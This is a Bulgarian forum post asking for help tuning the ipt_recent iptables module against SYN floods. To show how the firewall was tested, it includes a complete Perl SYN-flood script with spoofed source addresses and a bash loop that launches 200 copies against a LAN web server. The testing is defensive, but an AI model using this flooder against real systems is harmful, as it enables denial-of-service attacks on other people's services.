Колеги и аз да се включа в тази интересна тема.
Ако може да ми дадете малко акъл за ipt_recent аз също изчето темата (съвета) на VladSun
Не мога да сетна параметъра :
modprobe ipt_recentt ip_list_tot=500
Симулирах една syn ataka и когато атакуващите са под 100 -на се държи добре .т.е. отрязва достъпа на лошите, но котато са повече от 100 почти не сработва
Ето как пробвах защитната си стена:
GeSHi (Bash):
#!/bin/bash
for (( c=1; c<=200; c++ ))
do
perl synflood.pl 192.168.0.$c 192.168.0.224 80 &
done
Съдържанието на synfloog.pl
GeSHi (Bash):
#!/usr/bin/perl
# synflood.pl - Simple SYN Flooder
# Author: iphelix
#
# Requires perl, Net::RawIP module, and root privileges
use Net::RawIP;
if($#ARGV == 2) {
($src,$dst,$port) = @ARGV;
$a = new Net::RawIP;
while(1) {
$src_port = rand(65534)+1;
$a->set({ip => {saddr => $src,daddr => $dst},tcp => {source => $src_port,dest => $port, syn => 1}});
$a->send;
}
} else {
print "./synflooder source_ip destination_ip destination_port\n";
}
Ако може да датете някакви насоки ...
GeSHi (Bash):
uname -a
Linux router3 2.6.31.5-127.fc12.i686.PAE #1 SMP Sat Nov 7 21:25:57 EST 2009 i686 athlon i386 GNU/Linux